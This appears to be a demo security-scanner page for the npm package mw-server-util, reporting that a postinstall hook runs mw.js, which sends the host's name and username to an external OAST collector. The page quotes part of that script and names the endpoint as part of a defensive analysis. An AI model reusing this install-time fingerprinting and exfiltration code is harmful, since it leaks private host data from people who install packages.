registry  /  mw-server-util  /  2.0.0

mw-server-util@2.0.0

DEMO

AI Security Review

scanned 2h ago · by lpm-firewall-ai

Installing the package automatically executes `mw.js`. It fingerprints the host and sends the hostname and username to a third-party collector.

Static reason
One or more suspicious static signals were detected.
Trigger
npm postinstall during package installation
Impact
Discloses local host identity and username without user action.
Mechanism
install-time host fingerprint exfiltration over HTTPS
Attack narrative
`package.json` runs `node mw.js` automatically at postinstall. The script obtains `os.hostname()` and `os.userInfo().username`, places them in query parameters, and issues an HTTPS GET to an external OAST collector while suppressing errors. This is unconsented install-time host-data exfiltration.
Rationale
Direct source inspection confirms automatic postinstall execution and external transmission of local hostname and username. This is concrete malicious behavior, not a package-aligned feature.
Evidence
package.jsonmw.js
Network endpoints1
gdx35zc4m7hymba6asotmwhd349vxlla.oastify.com/beacon

Decision evidence

public snapshot
AI called this Malicious at 99.0% confidence as Malware with low false-positive risk.
Evidence for block
  • `package.json` defines `postinstall: node mw.js`.
  • `mw.js` collects the local hostname and OS username.
  • `mw.js` sends the collected identifiers to an external OAST endpoint during install.
  • The request errors are silently ignored, and the package has no functional entrypoint.
Evidence against
    Behavioral surface
    Source
    Network
    Supply chain
    HighEntropyStringsTrivialUrlStrings
    Manifest
    NoLicense
    scanned 1 file(s), 412 B of source, external domains: gdx35zc4m7hymba6asotmwhd349vxlla.oastify.com

    Source & flagged code

    2 flagged · loading source
    package.jsonView file
    scripts.postinstall = node mw.js
    High
    Install Time Lifecycle Scripts

    Package defines install-time lifecycle scripts.

    package.jsonView on unpkg
    1const os = require("os"), https = require("https"); L2: const COLLECTOR = "https://[redacted].oastify.com/beacon"; L3: const payload = new URLSearchParams({ L4: host: os.hostname(), user: os.userInfo().username, pkg: "mw-proto-ts", L5: ts: new Date().toISOString()
    High
    Host Fingerprint Exfiltration

    Source collects local host identity data and sends it to an external endpoint.

    mw.jsView on unpkg · L1

    Findings

    2 High1 Medium4 Low
    HighInstall Time Lifecycle Scriptspackage.json
    HighHost Fingerprint Exfiltrationmw.js
    MediumNetwork
    LowScripts Present
    LowHigh Entropy Strings
    LowUrl Strings
    LowNo License